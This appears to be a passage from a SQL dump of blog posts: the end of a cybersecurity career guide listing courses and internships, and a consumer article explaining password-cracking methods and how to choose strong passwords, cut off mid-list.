Several beginner-friendly courses are available—select the one that works best for your learning style and budget.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+ </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.comptia.org/training/by-certification/security\" target=\"_blank\" rel=\"nofollow noopener\">Preparation Material</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Most recognized in the industry but relatively expensive.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Covers a wide range of topics, but hands-on labs are limited.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Google Cybersecurity Certificate </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://grow.google/intl/en_ca/certificates/cybersecurity/\" target=\"_blank\" rel=\"nofollow noopener\">Google Cybersecurity Certificate</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 
value=\"5\">Affordable and includes hands-on practice in Linux, MySQL, and Python.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Prepares you for the Security+ exam with a 30% discount included.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Microsoft Cybersecurity Analyst </strong></b><strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://learn.microsoft.com/en-us/credentials/certifications/security-compliance-and-identity-fundamentals/\" target=\"_blank\" rel=\"nofollow noopener\">Microsoft Cybersecurity Analyst</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Similar to Google’s certification and also budget-friendly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\">Prepares you for the SC-900 certification.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"10\"><b><strong class=\"font-bold\">ISC2 Certified in Cybersecurity</strong></b><strong>  <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.isc2.org/Certifications/CC\" target=\"_blank\" rel=\"nofollow noopener\">ISC2 Certified in Cybersecurity</a></strong></li>\r\n 	<li 
class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"11\">Completely free and an excellent introductory course for cybersecurity beginners.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For a comprehensive learning experience, we recommend combining the <b><strong class=\"font-bold\">CompTIA Security+</strong></b> with the <b><strong class=\"font-bold\">Google Cybersecurity Certificate</strong></b> to gain both theoretical understanding and practical skills.</p>\r\n\r\n<h2 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Discover Your Cybersecurity Path</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity spans multiple specializations such as Cloud Security, Penetration Testing, and Security Analysis. After completing your beginner courses, explore these niches further to determine where your interests lie.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, focus on crafting an impressive CV that highlights your skills and certifications.</p>\r\n\r\n<h2 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Gain Hands-On Experience with Projects</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practical experience is essential for any cybersecurity career. 
Start building your portfolio with these beginner-friendly projects to demonstrate your skills to potential employers.</p>\r\n\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/en/us/solutions/small-business/resource-center/networking/how-to-build-small-business-network.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a Network</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/en_us/blog/learn/siem-tutorial.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a SIEM</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/paralax/awesome-honeypots\" target=\"_blank\" rel=\"nofollow noopener\">Build a Honeypot</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a Malware Analysis Lab</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ctfd.io/whats-a-ctf/\" target=\"_blank\" rel=\"nofollow 
noopener\">Create a CTF Challenge</a></strong></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These projects will allow you to apply what you’ve learned and work on real-world scenarios, boosting your confidence and expertise.</p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">5. SOC Level 1 on TryHackMe</h2>\r\nAfter creating your initial projects, consider enhancing your skills with the SOC Level 1 course on TryHackMe. This course dives deep into analyzing and responding to security incidents, preparing you for roles such as a Cybersecurity Analyst.<strong>\r\n<a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tryhackme.com/path/outline/soclevel1\" target=\"_blank\" rel=\"nofollow noopener\">TryHackMe SOC Level 1</a></strong>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">6. 
Complete a Virtual Internship</h2>\r\nGain real-world experience through virtual internship programs offered by major companies:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/Hf4QMESoFeQwXPsiH/Mastercard-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">Mastercard Cybersecurity Virtual Experience Program</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/mADkQGHo4x7kN6kLv/JPMorgan-Chase-Cybersecurity-Virtual-Experience\" target=\"_blank\" rel=\"nofollow noopener\">JPMorgan Chase &amp; Co. 
Cybersecurity Virtual Experience</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/CfGzTzHzee9zJpNzs/Commonwealth-Bank-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">Commonwealth Bank Cybersecurity Virtual Experience Program</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/9GEqq3DpDLBzZAqgM/AIG-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">AIG Shields Up: Cybersecurity Virtual Experience Program</a></strong></li>\r\n</ul>\r\nThese internships provide valuable insights into the cybersecurity industry and can be added to your CV.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">7. 
Advanced Courses</h2>\r\nTo further enhance your knowledge, consider these advanced courses:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tryhackme.com/path/outline/soclevel2\" target=\"_blank\" rel=\"nofollow noopener\">TryHackMe SOC Level 2</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://securityblue.team/why-btl1/\" target=\"_blank\" rel=\"nofollow noopener\">Blue Team Level 1</a></strong></li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://letsdefend.io/soc-analyst-path.html\" target=\"_blank\" rel=\"nofollow noopener\"><strong>Let\'s Defend SOC Analyst Path</strong></a></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://cyberdefenders.org/\" target=\"_blank\" rel=\"nofollow noopener\">Cyber Defenders</a></strong></li>\r\n</ul>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">8. Applying for Jobs</h2>\r\nThroughout your learning journey, continuously update your CV and apply for jobs. Create a LinkedIn profile and search for opportunities in your area. Apply to as many relevant positions as possible to increase your chances of landing your first cybersecurity role. By following this comprehensive guide, you\'ll be well on your way to launching a successful career in cybersecurity. 
Remember, persistence and continuous learning are key in this rapidly evolving field.\r\n\r\nGood luck on your cybersecurity journey!\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep your CV updated throughout your learning process. Create a LinkedIn profile showcasing your certifications, projects, and internships. Use your network and online job portals to discover opportunities and apply for as many relevant positions as possible.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By taking this proactive approach, you’ll increase your chances of landing your first role in cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Tips for Launching Your Cybersecurity Career</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Persistence is key</strong></b>. The cybersecurity job market is competitive, but regular skill updates and active job applications can help you secure the right position.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay informed</strong></b>. Cyber threats are constantly evolving. Stay up-to-date by following cybersecurity news and trends.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Continuous Learning</strong></b>. 
Certifications, training, and workshops will keep you ahead of the curve and boost your long-term career growth.</li>\r\n</ul>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:36:12', '2026-01-12 21:41:44', 'Information Security', 'A Comprehensive Guide to Starting Your Cybersecurity Career', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(118, 'How Long Does It Take for a Hacker to Crack a Password?', 'how-long-does-it-take-for-a-hacker-to-crack-a-password', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing your online accounts has never been more critical. With cyber threats continuing to evolve, strong passwords remain your first line of defense. But have you ever wondered just how secure your password is, or how long it would take a hacker to crack it?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide explores the intricacies of password security, helping you understand how passwords are cracked, the factors that influence their security, and practical tips to create robust passwords that keep your data safe.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Password Cracking?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password cracking is the process hackers use to discover passwords through stored or transmitted data, typically employing specialized algorithms and powerful software tools. These methods aim to break password security and access sensitive data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to check your password\'s security? 
Try these tools to get started:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://cybernews.com/password-leak-check\">Check if your password has been leaked</a>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://haveibeenpwned.com/\">Find out if your email has been compromised in a data breach</a>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.passwordmonster.com/\">Test your password’s strength</a>.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Caution:</strong></b> never type a password you actually use into a third-party “strength” or “leak” checker. You are sending that secret to a site you do not control, and you cannot verify what it logs. Test only throwaway candidates, or use a checker that works locally or through the Have I Been Pwned k-anonymity range lookup, where only the first few characters of a hash ever leave your device.</p>\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Factors That Affect How Quickly a Password Can Be Cracked</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Password Length</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The length of your password directly influences the time it takes to crack. 
Here’s an approximate breakdown of how long it might take to crack a randomly chosen password based on its length alone, assuming an offline attack against a leaked, fast, unsalted hash on GPU hardware:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">5 characters: Instantly cracked.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">7 characters: A few seconds to minutes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">9 characters: Hours to days.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">12 characters: Years to decades.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">15+ characters: Tens of thousands to millions of years.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Simply adding extra characters to your password drastically increases its security, because every added character multiplies the number of possible combinations by the size of the character set. Keep in mind what these figures assume: if the stolen hash uses a slow, salted algorithm such as bcrypt, scrypt or Argon2, each guess costs orders of magnitude more; and against an online login with rate limiting or lockout, raw guessing speed is largely irrelevant. The numbers also apply only to random passwords—a common word or a predictable variation of one falls to a dictionary attack long before brute force is needed.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Password Complexity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password complexity refers to the combination of character types used. A password that includes uppercase and lowercase letters, numbers, and special characters is far harder to crack. 
For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“password” (lowercase letters only): Cracked instantly—it sits at the top of every wordlist.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“Password1” (lowercase, uppercase, and a number): A few hours by pure brute force on paper, but it appears in every leaked-password list, so a dictionary attack finds it instantly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">“P@ssw0rd!” (includes all character types): Several days or weeks by brute force on paper, yet swapping a for @ and o for 0 is a standard cracking rule, so in practice it also falls instantly.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The lesson is that character variety only helps when the result is not a predictable variation of a common word. A long, genuinely random string—or a passphrase of several unrelated words—beats a short “complex” password every time.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Password Uniqueness</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using the same password across multiple accounts is a dangerous practice. If one site is breached and your password leaks, attackers automatically replay the same email-and-password pair against other services (credential stuffing), so every account sharing that password is exposed—no matter how strong it is.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Methods Hackers Use to Crack Passwords</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Brute Force Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A brute force attack systematically tries every possible character combination until the correct one is found. 
While effective, this method becomes exponentially slower with longer and more complex passwords, which is why attackers try the cheaper methods below first.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Dictionary Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This method uses pre-compiled lists of commonly used words and previously leaked passwords, usually combined with mangling rules (appending digits or a year, capitalising the first letter, swapping letters for look-alike symbols). If your password is something simple like \"sunflower,\" or a predictable variation of it, a dictionary attack is likely to crack it in seconds.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Rainbow Table Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Instead of guessing passwords individually, rainbow tables use pre-computed chains of hashes to reverse a stolen hash with a lookup. They only work against unsalted hashes: when each user’s password is hashed with a unique random salt, no table can be computed in advance, so this attack is a symptom of a poorly designed password store rather than of a weak password.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Phishing and Social Engineering</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often bypass password cracking altogether by tricking individuals into sharing their passwords, typically through fraudulent emails or fake login pages.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Strengthen Your Password Security</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Long Passwords</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Aim for at least 12 characters—but go longer if possible. Each additional character exponentially increases the cracking time.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Mix Character Types</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create passwords that incorporate uppercase and lowercase letters, numbers, and special symbols. Avoid predictable substitutions like replacing \"E\" with \"3\" or \"A\" with \"@,\" as hackers are familiar with these tricks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Avoid Personal Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t use names, birthdays, or other personal details that hackers can easily guess from social media or public records.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Use Passphrases</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Passphrases like \"ILovePizzaWithExtraCheese!\" are both long and memorable, making them an excellent alternative to random strings of characters.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Invest in a Password Manager</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password managers can generate and store strong, unique passwords for all your accounts, easing the burden of remembering multiple complex passwords.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
Enable Two-Factor Authentication (2FA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if your password is compromised, 2FA adds an additional security layer that requires a second verification step, such as a code sent to your phone.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Password Cracking Examples</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how long it might take to crack some common passwords using brute force attacks on a modern computer system:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“123456”: Less than a second.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“qwerty”: Less than a second.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">“password1”: A few seconds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">“iloveyou123”: A few minutes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 